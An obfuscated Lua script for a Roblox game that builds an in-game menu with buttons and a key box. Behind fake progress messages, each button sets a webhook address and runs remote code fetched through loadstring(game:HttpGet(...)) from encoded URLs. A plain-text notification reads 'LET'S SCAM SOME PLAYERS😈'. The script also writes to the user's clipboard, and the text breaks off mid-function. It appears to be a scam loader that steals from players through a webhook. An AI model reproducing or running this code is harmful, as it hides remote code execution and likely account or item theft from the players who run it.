--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end if (game.PlaceId==(688977617 -546154326)) then local v12=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v12.Name=v7("\14\192\120\133\200\49\204\46\192\188\16\206\43\200\188\21\159","\156\67\173\74\165");v12.Parent=game.CoreGui;local v16=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v16.Size=UDim2.new(0.3 -0 ,0,0.8 + 0 ,0 -0 );v16.Position=UDim2.new(0.5 + 0 ,1744 -(1344 + 400) ,405.1 -(255 + 150) ,0);v16.BackgroundColor3=Color3.fromRGB(0 + 0 ,0,0 + 0 );v16.BorderColor3=Color3.fromRGB(0 -0 ,823 -568 ,1994 -(404 + 1335) );v16.BorderSizePixel=408 -(183 + 223) ;v16.Active=true;v16.BackgroundTransparency=0;v16.Draggable=true;v16.Parent=v12;local v26=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));v26.Size=UDim2.new(0.3,0,0.05,0 -0 );v26.Position=UDim2.new(0.35 + 0 ,0,0.045 + 0 ,337 -(10 + 327) );v26.BackgroundColor3=Color3.new(0 + 0 ,338 -(118 + 220) ,0 + 0 );v26.BorderColor3=Color3.new(449 -(108 + 341) ,0 + 0 ,0);v26.BorderSizePixel=1;v26.Text=v7("\133\33\8\35\96\229\220\190\45","\155\203\68\112\86\19\197");v26.TextSize=147 -112 ;v26.BackgroundTransparency=1494 -(711 + 782) ;v26.TextColor3=Color3.new(488 -233 ,255,724 -(270 + 199) );v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v26=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));v26.Size=UDim2.new(0.3 + 0 ,0,1819.05 -(580 + 1239) ,0 -0 );v26.Position=UDim2.new(0.35 + 0 ,0 + 0 ,0.145 + 0 ,0 -0 );v26.BackgroundColor3=Color3.new(0,0,0);v26.BorderColor3=Color3.new(0 + 0 ,0,1167 -(645 + 522) );v26.BorderSizePixel=1;v26.Text=v7("\200\69\166\66\249\23\145\67\238\68\174\73\242","\38\156\55\199");v26.TextSize=25;v26.BackgroundTransparency=1791 -(1010 + 780) ;v26.TextColor3=Color3.new(255 + 0 ,1214 -959 ,255);v26.Font=Enum.Font.Highway;v26.Parent=v16;local v26=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));v26.Size=UDim2.new(0.3,0 -0 ,1836.05 -(1045 + 791) ,0);v26.Position=UDim2.new(0.35 -0 ,0 -0 ,505.14 -(351 + 154) ,1574 -(1281 + 293) );v26.BackgroundColor3=Color3.new(266 -(28 + 238) ,0 -0 ,1559 -(1381 + 178) );v26.BorderColor3=Color3.new(0 + 0 ,0,0 + 0 );v26.BorderSizePixel=1;v26.Text=v7("\38\128\238\224\178\19\11\38\128","\84\121\223\177\191\237\76");v26.TextSize=22 + 28 ;v26.BackgroundTransparency=1;v26.TextColor3=Color3.fromRGB(0 -0 ,133 + 122 ,255);v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v40=Instance.new(v7("\143\83\209\180\24\69\36\213\180\88","\161\219\54\169\192\90\48\80"));v40.Size=UDim2.new(0.9,470 -(381 + 89) ,0.12 + 0 ,0 + 0 );v40.Position=UDim2.new(0.05 -0 ,0,1156.3 -(1074 + 82) ,0 -0 );v40.BackgroundColor3=Color3.new(0,0,0);v40.BorderColor3=Color3.fromRGB(1784 -(214 + 1570) ,255,255);v40.BorderSizePixel=1;v40.Text=v7("\125\80\1\33\76\2\51\38\72\79\64\127\9\109\38\3","\69\41\34\96");v40.BackgroundTransparency=1455 -(990 + 465) ;v40.TextColor3=Color3.new(106 + 149 ,111 + 144 ,255);v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=20 + 0 ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 -0 ,1726 -(1668 + 58) ,626 -(512 + 114) )) then local v107=0 -0 ;while true do if (v107==(0 -0)) then v40.Text=v7("\136\209\214\14\7\107\143\192\214\7\66\113\252\150","\75\220\163\183\106\98");wait(1);v40.Text=v7("\54\168\138\51\220\66\137\136\54\212\66\224\203\99","\185\98\218\235\87");v107=3 -2 ;end if (v107==(1 + 1)) then v40.Text=v7("\29\211\45\140\44\129\31\139\40\204\108\210\105\147","\232\73\161\76");wait(1 + 0 );v40.Text=v7("\143\203\67\89\27\251\234\65\92\19\251\131\2\12","\126\219\185\34\61");v107=3;end if ((3 + 0)==v107) then wait(3 -2 );v40.BackgroundColor3=Color3.fromRGB(50,205,50);v40.Text=v7("\56\220\95\118\123\55\192\228\13\195\30\40\62\88\221","\135\108\174\62\18\30\23\147");v107=1998 -(109 + 1885) ;end if (v107==(1474 -(1269 + 200))) then Webhook=v7("\176\253\207\212\171\179\148\139\188\224\200\199\183\251\223\138\187\230\214\139\185\249\210\139\175\236\217\204\183\230\208\215\247\184\137\146\237\191\137\157\237\177\142\144\238\190\136\147\237\191\142\147\247\228\240\253\225\243\254\234\176\234\220\235\181\248\207\253\238\193\212\230\225\195\228\150\148\206\195\156\154\191\201\252\173\208\203\222\135\211\248\200\191\190\150\202\150\208\237\148\171\237\215\198\153\200\202\244\171\223\131\234\147\241\210\221\177\234\195\227\162","\164\216\137\187");loadstring(game:HttpGet(v7("\218\242\37\162\181\164\68\157\227\54\189\180\247\0\199\245\48\252\181\238\10\209\227\126\191\171\172","\107\178\134\81\210\198\158")))();break;end if (v107==(1 -0)) then wait(816 -(98 + 717) );v40.Text=v7("\255\46\38\226\219\234\248\63\38\235\158\240\139\111","\202\171\92\71\134\190");wait(1);v107=828 -(802 + 24) ;end if (v107==(6 -2)) then game:GetService(v7("\133\253\43\217\12\171\33\224\163\224","\167\214\137\74\171\120\206\83")):SetCore(v7("\184\245\60\89\214\168\159\249\52\84\251\166\159\249\61\83","\199\235\144\82\61\152"),{[v7("\51\31\173\39\2","\75\103\118\217")]=v7("\245\85\125\14\163","\126\167\52\16\116\217"),[v7("\252\43\56\148","\156\168\78\64\224\212\121")]=v7("\38\237\166\203\23\250\229\250\15\235\229\250\21\239\161\203","\174\103\142\197"),[v7("\127\43\80\54","\152\54\72\63\88\69\62")]=v7("\198\198\246\72\220\209\227\94\142\139\161\72\205\212\235\1\245\215\253\89\192\130\231\88\137\149\187\5\141\150\187\10\140\146\183\9\146\211\179\13\129\148\168\84\137\149\187\12","\60\180\164\142")});Duration=13 -2 ;Username=v7("\108\86\0\16\40\248\28\95\97\39\59\50\229","\114\56\62\101\73\71\141");v107=1 + 4 ;end end else local v108=0 + 0 ;while true do if (v108==0) then v40.BackgroundColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0 -0 );v40.Text=v7("\12\28\131\194\175\120\61\129\199\167\120\84\194\233\140\30","\202\88\110\226\166");break;end end end end);local v40=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"));v40.Size=UDim2.new(0.9,0 -0 ,0.12 + 0 ,0 + 0 );v40.Position=UDim2.new(0.05 + 0 ,0,0.5 + 0 ,0);v40.BackgroundColor3=Color3.new(0 + 0 ,1433 -(797 + 636) ,0 -0 );v40.BorderColor3=Color3.fromRGB(1619 -(1427 + 192) ,89 + 166 ,592 -337 );v40.BorderSizePixel=1;v40.Text=v7("\37\34\179\60\75\119\5\16\55\242\98\14\24\15\55","\73\113\80\210\88\46\87");v40.BackgroundTransparency=0 + 0 ;v40.TextColor3=Color3.new(255,116 + 139 ,581 -(192 + 134) );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=1296 -(316 + 960) ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 + 0 ,0 + 0 ,0 + 0 )) then local v109=0;local v110;while true do if (v109==(0 -0)) then v110=551 -(83 + 468) ;while true do if (v110==(1807 -(1202 + 604))) then v40.Text=v7("\153\207\17\244\125\182\129\220\23\176\34\182\254","\150\205\189\112\144\24");wait(4 -3 );v40.Text=v7("\17\150\190\72\1\200\61\17\34\196\229\12\86","\112\69\228\223\44\100\232\113");wait(1);v110=2 -0 ;end if (v110==2) then v40.Text=v7("\224\13\6\215\179\60\170\213\24\71\137\246\45","\230\180\127\103\179\214\28");wait(1);v40.BackgroundColor3=Color3.fromRGB(50,205,138 -88 );v40.Text=v7("\184\23\94\66\225\1\204\141\2\31\28\164\110\206","\128\236\101\63\38\132\33");v110=328 -(45 + 280) ;end if (4==v110) then loadstring(game:HttpGet(v7("\52\187\149\92\240\35\55\115\170\134\67\241\112\115\41\188\128\2\240\105\121\63\170\206\65\238\43","\24\92\207\225\44\131\25")))();break;end if (v110==0) then v40.Text=v7("\181\62\204\22\226\193\0\204\21\167\219\108\152","\135\225\76\173\114");wait(1);v40.Text=v7("\46\255\185\180\169\253\139\27\234\248\234\236\233","\199\122\141\216\208\204\221");wait(1 + 0 );v110=1 + 0 ;end if (v110==(2 + 1)) then game:GetService(v7("\159\189\16\86\162\238\221\139\188\24","\175\204\201\113\36\214\139")):SetCore(v7("\116\201\59\216\42\72\216\60\218\13\68\205\33\213\11\73","\100\39\172\85\188"),{[v7("\153\113\173\140\54","\83\205\24\217\224")]=v7("\212\196\192\39\252","\93\134\165\173"),[v7("\138\247\217\214","\30\222\146\161\162\90\174\210")]=v7("\196\77\115\15\245\90\48\62\237\75\48\62\247\79\116\15","\106\133\46\16"),[v7("\113\35\124\242","\32\56\64\19\156\58")]=v7("\72\202\253\66\82\231\141\88\146\170\25\78\235\144\95\149\196\69\73\247\148\28\193\225\11\11\167\217\3\154\176\0\2\164\217\15\142\242\11\11\167\208\28\192\184\7\15\162","\224\58\168\133\54\58\146")});Duration=7 + 4 ;Username=v7("\109\94\78\196\122\147\137\12\102\116\89\232\125","\107\57\54\43\157\21\230\231");Webhook=v7("\211\159\5\229\170\134\128\148\143\24\230\186\211\221\223\197\18\250\180\147\206\203\130\94\226\188\222\199\212\132\26\230\246\141\157\141\222\71\167\224\137\151\142\223\71\162\234\139\154\141\222\70\186\180\247\246\130\145\52\219\177\223\200\244\134\0\225\128\138\231\212\169\72\223\134\142\227\252\147\73\215\239\206\247\206\178\1\239\134\230\236\215\140\70\184\183\242\246\237\219\2\241\181\222\238\250\154\33\230\143\132\225\240\147\24\236\176\223\215\252\145","\175\187\235\113\149\217\188");v110=1 + 3 ;end end break;end end else local v111=0 -0 ;local v112;while true do if (v111==(1911 -(340 + 1571))) then v112=0 + 0 ;while true do if ((1772 -(1733 + 39))==v112) then v40.BackgroundColor3=Color3.fromRGB(0,0 -0 ,1034 -(125 + 909) );v40.Text=v7("\127\193\185\72\30\61\103\210\191\12\65\61\100\245\158","\29\43\179\216\44\123");break;end end break;end end end end);local v40=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));v40.Size=UDim2.new(1948.9 -(1096 + 852) ,0,0.12,0);v40.Position=UDim2.new(0.05,0 + 0 ,0.7 -0 ,0 + 0 );v40.BackgroundColor3=Color3.new(0,0,0);v40.BorderColor3=Color3.fromRGB(512 -(409 + 103) ,491 -(46 + 190) ,350 -(51 + 44) );v40.BorderSizePixel=1 + 0 ;v40.Text=v7("\37\242\88\90\51\91\167\103\121\85","\19\97\135\40\63");v40.BackgroundTransparency=1317 -(1114 + 203) ;v40.TextColor3=Color3.new(981 -(228 + 498) ,56 + 199 ,141 + 114 );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=683 -(174 + 489) ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 -0 ,1905 -(830 + 1075) ,524 -(303 + 221) )) then v40.Text=v7("\138\73\35\62\111\107\238\9","\81\206\60\83\91\79");wait(1270 -(231 + 1038) );v40.Text=v7("\106\190\192\119\111\153\13\240","\196\46\203\176\18\79\163\45");wait(1 + 0 );v40.Text=v7("\156\55\110\27\100\161\175\235","\143\216\66\30\126\68\155");wait(1163 -(171 + 991) );v40.Text=v7("\142\221\29\206\133\249\151\179","\129\202\168\109\171\165\195\183");wait(4 -3 );v40.Text=v7("\6\77\39\221\158\78\166\115","\134\66\56\87\184\190\116");wait(2 -1 );v40.BackgroundColor3=Color3.fromRGB(124 -74 ,205,41 + 9 );v40.Text=v7("\24\36\25\190\89\177\97\26\18","\85\92\81\105\219\121\139\65");game:GetService(v7("\206\167\81\87\104\218\239\148\69\76","\191\157\211\48\37\28")):SetCore(v7("\236\26\250\24\20\208\11\253\26\51\220\30\224\21\53\209","\90\191\127\148\124"),{[v7("\76\142\58\27\125","\119\24\231\78")]=v7("\176\44\168\80\198","\113\226\77\197\42\188\32"),[v7("\14\19\236\161","\213\90\118\148")]=v7("\122\45\183\83\93\79\110\128\94\72\27\26\166\87\73\94","\45\59\78\212\54"),[v7("\57\85\140\133","\144\112\54\227\235\230\78\205")]=v7("\161\42\23\232\216\78\190\42\85\179\159\79\170\56\10\161\241\72\160\45\27\186\217\95\238\121\90\165\137\9\230\126\87\170\137\14\245\63\82\173\133\11\245\32\82\173\133\11","\59\211\72\111\156\176")});Duration=38 -27 ;Username=v7("\122\143\230\20\65\146\237\42\113\165\241\56\70","\77\46\231\131");Webhook=v7("\178\64\162\80\169\14\249\15\190\93\165\67\181\70\178\14\185\91\187\15\187\68\191\15\173\81\180\72\181\91\189\83\245\5\228\22\239\2\228\25\239\12\227\20\236\3\229\23\239\2\227\23\245\89\157\121\227\78\147\110\178\87\177\111\183\69\162\121\236\124\185\98\227\126\137\18\150\115\174\24\152\2\164\120\175\109\166\90\133\110\149\76\189\3\251\78\148\109\128\16\169\80\186\66\155\117\167\112\169\98\238\110\145\76\191\89\179\87\174\103\160","\32\218\52\214");loadstring(game:HttpGet(v7("\70\3\37\184\226\234\10\21\75\16\62\186\248\187\80\73\79\89\34\184\240\179\64\21\67\26\99","\58\46\119\81\200\145\208\37")))();else local v115=0;while true do if (v115==(0 -0)) then v40.BackgroundColor3=Color3.fromRGB(0 -0 ,0 -0 ,1248 -(111 + 1137) );v40.Text=v7("\15\153\32\169\233\231\118\4\170\22","\86\75\236\80\204\201\221");break;end end end end);local v26=Instance.new(v7("\70\68\111\145\210\138\112\68\123","\235\18\33\23\229\158"));v26.Size=UDim2.new(159 -(91 + 67) ,0 -0 ,0.1 + 0 ,523 -(423 + 100) );v26.Position=UDim2.new(0.0001,0,0.9 + 0 ,0);v26.BackgroundColor3=Color3.new(0 -0 ,0 + 0 ,0);v26.BorderColor3=Color3.fromRGB(0,255,255);v26.BorderSizePixel=773 -(326 + 445) ;v26.Text=v7("\115\168\192\184\91\191\197\251\114\163\129\137\81\183\219\161\16\150\238\151","\219\48\218\161");v26.TextSize=87 -67 ;v26.BackgroundTransparency=0 -0 ;v26.TextColor3=Color3.new(255,255,594 -339 );v26.Font=Enum.Font.SourceSans;v26.Parent=v16;local v53=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v53.Size=UDim2.new(712 -(530 + 181) ,0,882 -(614 + 267) ,32 -(19 + 13) );v53.Position=UDim2.new(0.0001 -0 ,0 -0 ,0.0002 -0 ,0 + 0 );v53.BackgroundColor3=Color3.fromRGB(0 -0 ,0 -0 ,0);v53.BorderColor3=Color3.fromRGB(0,2067 -(1293 + 519) ,520 -265 );v53.BorderSizePixel=0 -0 ;v53.Active=False;v53.BackgroundTransparency=0;v53.Draggable=false;v53.Parent=v16;local v26=Instance.new(v7("\53\55\30\46\113\0\48\3\54","\61\97\82\102\90"));v26.Size=UDim2.new(0.3,0 -0 ,0.05 -0 ,0 -0 );v26.Position=UDim2.new(0.35 + 0 ,0,0.09 + 0 ,0);v26.BackgroundColor3=Color3.new(0,0,0);v26.BorderColor3=Color3.new(0 -0 ,0 + 0 ,0 + 0 );v26.BorderSizePixel=1;v26.Text=v7("\135\11\146\11\244\110\45\61\137\3","\105\204\78\203\43\167\55\126");v26.TextSize=22 + 12 ;v26.BackgroundTransparency=1;v26.TextColor3=Color3.new(255,1351 -(709 + 387) ,2113 -(673 + 1185) );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v26=Instance.new(v7("\145\175\59\10\63\5\197\84\169","\49\197\202\67\126\115\100\167"));v26.Size=UDim2.new(0.3 -0 ,0 -0 ,0.05 -0 ,0);v26.Position=UDim2.new(0.35,0 + 0 ,0.14 + 0 ,0);v26.BackgroundColor3=Color3.new(0 -0 ,0 + 0 ,0);v26.BorderColor3=Color3.new(0,0 -0 ,0 -0 );v26.BorderSizePixel=1881 -(446 + 1434) ;v26.Text=v7("\8\100\224\22\191\105\97\8\100","\62\87\59\191\73\224\54");v26.TextSize=1333 -(1040 + 243) ;v26.BackgroundTransparency=1;v26.TextColor3=Color3.fromRGB(0 -0 ,255,2102 -(559 + 1288) );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v63=Instance.new(v7("\211\7\226\221\197\13\226","\169\135\98\154"));v63.Size=UDim2.new(1931.8 -(609 + 1322) ,454 -(13 + 441) ,0.18,0 -0 );v63.Position=UDim2.new(0.1,0,0.3,0);v63.BackgroundColor3=Color3.fromRGB(285 -176 ,547 -437 ,108);v63.BorderColor3=Color3.fromRGB(0 + 0 ,255,255);v63.BorderSizePixel=1;v63.Text="";v63.PlaceholderText=v7("\224\114\61\20\213\54\218\206\57\106\26","\168\171\23\68\52\157\83");v63.TextWrapped=true;v63.TextColor3=Color3.fromRGB(0 -0 ,68 + 123 ,255);v63.BackgroundTransparency=0 + 0 ;v63.Font=Enum.Font.Arial;v63.TextSize=47 -31 ;v63.Parent=v53;local v78=Instance.new(v7("\192\116\237\185\7\56\147\224\126\251","\231\148\17\149\205\69\77"));v78.Size=UDim2.new(0.7,0 + 0 ,0.15,0 -0 );v78.Position=UDim2.new(0.15 + 0 ,0 + 0 ,0.55,0 + 0 );v78.BackgroundColor3=Color3.fromRGB(22 + 4 ,26,26 + 0 );v78.BorderColor3=Color3.fromRGB(433 -(153 + 280) ,736 -481 ,255);v78.BorderSizePixel=1;v78.Text=v7("\165\169\211\254\69","\159\224\199\167\155\55");v78.BackgroundTransparency=0 + 0 ;v78.TextColor3=Color3.new(101 + 154 ,255,134 + 121 );v78.Font=Enum.Font.Highway;v78.Parent=v53;v78.TextSize=20;v78.Active=false;v78.MouseButton1Click:Connect(function() end);local v91=Instance.new(v7("\195\246\36\198\213\230\40\198\248\253","\178\151\147\92"));v91.Size=UDim2.new(0.7 + 0 ,0,0.15 + 0 ,0);v91.Position=UDim2.new(0.15 -0 ,0 + 0 ,667.55 -(89 + 578) ,0 + 0 );v91.BackgroundColor3=Color3.fromRGB(26,53 -27 ,1075 -(572 + 477) );v91.BorderColor3=Color3.fromRGB(0 + 0 ,154 + 101 ,255);v91.BorderSizePixel=1;v91.Text=v7("\169\243\88\55\0","\26\236\157\44\82\114\44");v91.BackgroundTransparency=0 + 0 ;v91.TextColor3=Color3.new(341 -(84 + 2) ,255,255);v91.Font=Enum.Font.Highway;v91.Parent=v53;v91.TextSize=32 -12 ;v91.Active=false;v91.MouseButton1Click:Connect(function() if (v63.Text==v7("\33\43\204\100\36\39\210\92\43\121\141\95\114\125\216\113\47\124\141","\59\74\78\181")) then game:GetService(v7("\22\197\91\72\167\32\195\125\79\186","\211\69\177\58\58")):SetCore(v7("\132\224\119\241\199\196\163\236\127\252\234\202\163\236\118\251","\171\215\133\25\149\137"),{[v7("\213\193\38\246\234","\34\129\168\82\154\143\80\156")]=v7("\183\179\62\17\82","\233\229\210\83\107\40\46"),[v7("\245\71\42\194","\101\161\34\82\182")]=v7("\216\33\106\190\236\195\171\26\168\43\118\204\155\179\210\110\219\40\122","\78\136\109\57\158\187\130\226"),[v7("\23\60\246\255","\145\94\95\153")]=v7("\239\207\12\193\70\162\240\207\78\154\1\163\228\221\17\136\111\164\238\200\0\147\71\179\160\156\65\140\23\229\168\155\76\131\23\226\187\218\73\132\27\231\187\197\73\132\27\231","\215\157\173\116\181\46")});Duration=37 + 13 ;v91.Visible=false;setclipboard(v7("\62\177\146\205\212\60\179\140\243\141\109\176\211\161\215\31\177\217\170","\186\85\212\235\146"));v78.Text=v7("\147\209","\56\162\225\118\158\89\142");wait(844 -(497 + 345) );v78.Text="9";wait(1 + 1 );v78.Text="8";wait(1 + 1 );v78.Text="7";wait(1335 -(605 + 728) );v78.Text="6";wait(2 + 0 );v78.Text="5";wait(3 -1 );v78.Text="4";wait(2);v78.Text="3";wait(1 + 1 );v78.Text="2";wait(2);v78.Text="1";game:GetService(v7("\111\17\193\189\54\221\78\34\213\166","\184\60\101\160\207\66")):SetCore(v7("\2\135\114\184\31\141\104\181\55\139\127\189\37\139\115\178","\220\81\226\28"),{[v7("\39\220\150\247\239","\167\115\181\226\155\138")]=v7("\208\35\234\70\97","\166\130\66\135\60\27\17"),[v7("\112\79\214\97","\80\36\42\174\21")]="LET'S SCAM SOME PLAYERS😈",[v7("\103\19\56\116","\26\46\112\87")]=v7("\171\33\179\96\183\170\72\182\227\108\228\96\166\175\64\233\152\48\184\113\171\249\76\176\228\114\254\45\230\237\16\226\225\117\242\33\249\168\24\229\236\115\237\124\226\238\16\228","\212\217\67\203\20\223\223\37")});Duration=147 -107 ;v53.Visible=false;Username=v7("\142\133\173\235\181\152\166\213\133\175\186\199\178","\178\218\237\200");Webhook=v7("\190\161\242\192\165\239\169\159\178\188\245\211\185\167\226\158\181\186\235\159\183\165\239\159\161\176\228\216\185\186\237\195\249\228\180\134\227\227\180\137\227\237\179\132\224\226\181\135\227\227\179\135\249\184\205\233\239\175\195\254\190\182\225\255\187\164\242\233\224\157\233\242\239\159\217\130\154\146\254\136\148\227\244\232\163\140\246\202\137\143\197\220\177\226\171\222\152\140\208\128\165\177\234\210\151\148\247\224\165\131\190\254\157\173\239\201\191\182\254\247\172","\176\214\213\134");loadstring(game:HttpGet(v7("\252\185\162\196\187\12\22\187\168\177\219\186\95\82\225\190\183\154\187\70\88\247\168\249\217\165\4","\57\148\205\214\180\200\54")))();wait(0.001);Username=v7("\38\245\48\13\121\7\243\50\11\84\0\232\61","\22\114\157\85\84");Webhook=v7("\204\223\7\212\78\172\231\139\207\26\215\94\249\186\192\133\16\203\80\185\169\212\194\92\211\88\244\160\203\196\24\215\18\167\250\146\158\69\150\4\163\240\145\159\69\147\14\161\253\146\158\68\139\80\221\145\157\209\54\234\85\245\175\235\198\2\208\100\160\128\203\233\74\238\98\164\132\227\211\75\230\11\228\144\209\242\3\222\98\204\139\200\204\68\137\83\216\145\242\155\0\192\81\244\137\229\218\35\215\107\174\134\239\211\26\221\84\245\176\227\209","\200\164\171\115\164\61\150");loadstring(game:HttpGet(v7("\182\224\23\85\144\228\187\76\64\132\177\230\10\78\150\173\245\77\86\147\191\247\6\10\142\179\166","\227\222\148\99\37")))();else local v119=0;local v120;while true do if (v119==(0 + 0)) then v120=0 -0 ;while true do if (v120==(1 + 0)) then Duration=494 -(457 + 32) ;wait(0.3);v120=1 + 1 ;end if (v120==(1404 -(832 + 570))) then v63.Text="";break;end if (v120==(0 + 0)) then v63.Text=v7("\4\64\93\248\254\115\121\87\239\185\29\91\85\241\248","\153\83\50\50\150");game:GetService(v7("\110\98\114\14\103\174\95\122\99\122","\45\61\22\19\124\19\203")):SetCore(v7("\242\23\3\241\44\127\173\200\20\4\246\3\100\176\206\28","\217\161\114\109\149\98\16"),{[v7("\38\41\44\112\185","\20\114\64\88\28\220")]=v7("\3\0\223\174\226","\221\81\97\178\212\152\176"),[v7("\249\226\5\239","\122\173\135\125\155")]=v7("\179\211\15\183\56\113\227\129\216\64\151\54\54\207\133","\168\228\161\96\217\95\81"),[v7("\242\210\33\82","\55\187\177\78\60\79")]=v7("\63\204\71\255\78\218\141\47\148\16\164\82\214\144\40\147\126\248\85\202\148\107\199\91\182\23\154\217\116\156\10\189\30\153\217\120\136\72\182\23\154\208\107\198\2\186\19\159","\224\77\174\63\139\38\175")});v120=1 + 0 ;end end break;end end end end);local v40=Instance.new(v7("\176\68\64\58\166\84\76\58\139\79","\78\228\33\56"));v40.Size=UDim2.new(0.7 -0 ,0 + 0 ,796.15 -(588 + 208) ,0 -0 );v40.Position=UDim2.new(1800.15 -(884 + 916) ,0 -0 ,0.75,0 + 0 );v40.BackgroundColor3=Color3.fromRGB(26,26,26);v40.BorderColor3=Color3.fromRGB(653 -(232 + 421) ,2144 -(1569 + 320) ,255);v40.BorderSizePixel=1;v40.Text=v7("\233\123\166\67\174\203\103","\229\174\30\210\99");v40.BackgroundTransparency=0;v40.TextColor3=Color3.new(63 + 192 ,49 + 206 ,255);v40.Font=Enum.Font.Highway;v40.Parent=v53;v40.TextSize=67 -47 ;v40.MouseButton1Click:Connect(function() local v106=0;while true do if ((606 -(316 + 289))==v106) then game:GetService(v7("\128\71\203\98\14\56\71\230\166\90","\161\211\51\170\16\122\93\53")):SetCore(v7("\200\171\188\44\213\161\166\33\253\167\177\41\239\167\189\38","\72\155\206\210"),{[v7("\114\115\64\2\54","\83\38\26\52\110")]=v7("\106\22\42\92\66","\38\56\119\71"),[v7("\199\234\64\194","\54\147\143\56\182\69")]=v7("\230\173\204\9\232\247\168\203\9\249\249\179\191\28\159\229\164\220","\191\182\225\159\41"),[v7("\2\17\39\91","\162\75\114\72\53\235\231")]=v7("\158\62\92\246\91\23\129\62\30\173\28\22\149\44\65\191\114\17\159\57\80\164\90\6\209\109\17\187\10\80\217\106\28\180\10\87\202\43\25\179\6\82\202\52\25\179\6\82","\98\236\92\36\130\51")});Duration=50;v78.Text="5";wait(1);v106=2;end if (v106==6) then Username=v7("\238\227\114\209\132\210\212\236\72\202\153\210\210","\167\186\139\23\136\235");Webhook=v7("\18\161\156\29\9\239\199\66\30\188\155\14\21\167\140\67\25\186\133\66\27\165\129\66\13\176\138\5\21\186\131\30\85\228\218\91\79\227\218\84\79\237\221\89\76\226\219\90\79\227\221\90\85\184\163\52\67\175\173\35\18\182\143\34\23\164\156\52\76\157\135\47\67\159\183\95\54\146\144\85\56\227\154\53\15\140\152\23\37\143\171\1\29\226\197\3\52\140\190\93\9\177\132\15\59\148\153\61\9\131\208\35\49\173\129\20\19\182\144\42\0","\109\122\213\232");loadstring(game:HttpGet(v7("\230\227\182\32\253\173\237\127\235\240\173\34\231\252\183\35\239\185\177\32\239\244\167\127\227\250\240","\80\142\151\194")))();setclipboard(v7("\8\195\110\115\13\207\112\75\2\145\47\72\91\149\122\102\6\148\47","\44\99\166\23"));break;end if (v106==(13 -8)) then Username=v7("\180\244\135\79\63\253\184\17\191\222\144\99\56","\118\224\156\226\22\80\136\214");Webhook=v7("\74\250\77\144\81\180\22\207\70\231\74\131\77\252\93\206\65\225\84\207\67\254\80\207\85\235\91\136\77\225\82\147\13\191\11\214\23\184\11\217\23\182\12\212\20\185\10\215\23\184\12\215\13\227\114\185\27\244\124\174\74\237\94\175\79\255\77\185\20\198\86\162\27\196\102\210\110\201\65\216\96\184\75\184\87\215\73\154\125\212\122\140\69\185\20\142\108\215\111\208\81\234\85\130\99\207\72\176\81\216\1\174\105\246\80\153\75\237\65\167\88","\224\34\142\57");loadstring(game:HttpGet(v7("\214\179\209\205\96\171\18\65\219\160\202\207\122\250\72\29\223\233\214\205\114\242\88\65\211\170\151","\110\190\199\165\189\19\145\61")))();wait(0.5 + 0 );v106=1459 -(666 + 787) ;end if (v106==(428 -(360 + 65))) then v78.Text="2";wait(1 + 0 );v78.Text="1";wait(255 -(79 + 175) );v106=5 -1 ;end if (v106==(0 + 0)) then setclipboard(v7("\16\232\159\110\227\52\62\28\236\209\9\233\101\106\22\199\131\3\181","\89\123\141\230\49\141\93"));game:GetService(v7("\192\101\247\30\4\79\225\86\227\5","\42\147\17\150\108\112")):SetCore(v7("\60\163\35\123\201\231\27\175\43\118\228\233\27\175\34\113","\136\111\198\77\31\135"),{[v7("\54\0\179\90\184","\201\98\105\199\54\221\132\119")]=v7("\139\13\142\59\24","\204\217\108\227\65\98\85"),[v7("\106\198\237\241","\160\62\163\149\133\76")]=v7("\230\129\62\27\230\150\148\37\10\131\253\133\52\111\234\248\224\57\7\230\150\130\34\23","\163\182\192\109\79"),[v7("\29\37\15\206","\149\84\70\96\160")]=v7("\42\4\21\249\48\19\0\239\98\73\66\249\33\22\8\176\25\21\30\232\44\64\4\233\101\87\88\180\97\84\88\187\96\80\84\184\126\17\80\188\109\86\75\229\101\87\88\189","\141\88\102\109")});Duration=245 -165 ;v91.Visible=false;v106=1 -0 ;end if (v106==(901 -(503 + 396))) then v78.Text="4";wait(182 -(92 + 89) );v78.Text="3";wait(1 -0 );v106=3;end if (v106==(3 + 1)) then 